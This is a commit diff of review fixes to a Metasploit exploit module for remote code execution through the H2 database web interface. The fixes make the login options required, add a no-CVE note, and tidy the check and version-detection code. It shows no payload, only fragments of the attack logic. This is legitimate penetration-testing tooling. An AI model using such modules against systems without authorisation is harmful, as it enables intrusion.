review comments

h00die · Aug 5, 2023 · 3fa0a57 · 3fa0a57
1 parent 418c792
commit 3fa0a57
Showing 1 changed file with 5 additions and 9 deletions.
diff --git a/modules/exploits/linux/http/h2_webinterface_rce.rb b/modules/exploits/linux/http/h2_webinterface_rce.rb
@@ -59,16 +59,17 @@ def initialize(info = {})
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'NOCVE' => ['abusing a feature']
         }
       )
     )
     register_options(
       [
         Opt::RPORT(80),
         OptString.new('USERNAME', [ true, 'User to login with', '']),
-        OptString.new('PASSWORD', [ false, 'Password to login with', '']),
-        OptString.new('DATABASE', [ false, 'Database to use', 'jdbc:h2:mem:']),
+        OptString.new('PASSWORD', [ true, 'Password to login with', '']),
+        OptString.new('DATABASE', [ true, 'Database to use', 'jdbc:h2:mem:']),
         OptString.new('TARGETURI', [ true, 'The URI of the H2 web interface', '/']),
         OptBool.new('GETVERSION', [ true, 'Get the version of the database before exploiting', true])
       ]
@@ -94,11 +95,6 @@ def get_jsessionid
 
   def check
     jsessionid = get_jsessionid
-    send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'login.jsp'),
-      'method' => 'GET'
-    )
-    return CheckCode::Unknown("#{peer} - Could not connect to web service or unable to determine JsessionID") if jsessionid.nil?
 
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'login.jsp'),
@@ -157,7 +153,7 @@ def send_command(jsessionid, command)
   def get_version(jsessionid)
     version = send_command(jsessionid, 'SELECT H2VERSION() FROM DUAL;')
     # regex likely to break on version upgrades unfortunately
-    if version.nil? == false && version =~ %r{<table class="resultSet" cellspacing="0" cellpadding="0"><tr><th>H2VERSION\(\)</th></tr><tr><td>([^<]+)</td></tr></table>}
+    if version =~ %r{<table class="resultSet" cellspacing="0" cellpadding="0"><tr><th>H2VERSION\(\)</th></tr><tr><td>([^<]+)</td></tr></table>}
       print_good("H2 Version detected: #{Regexp.last_match(1)}")
       return
     end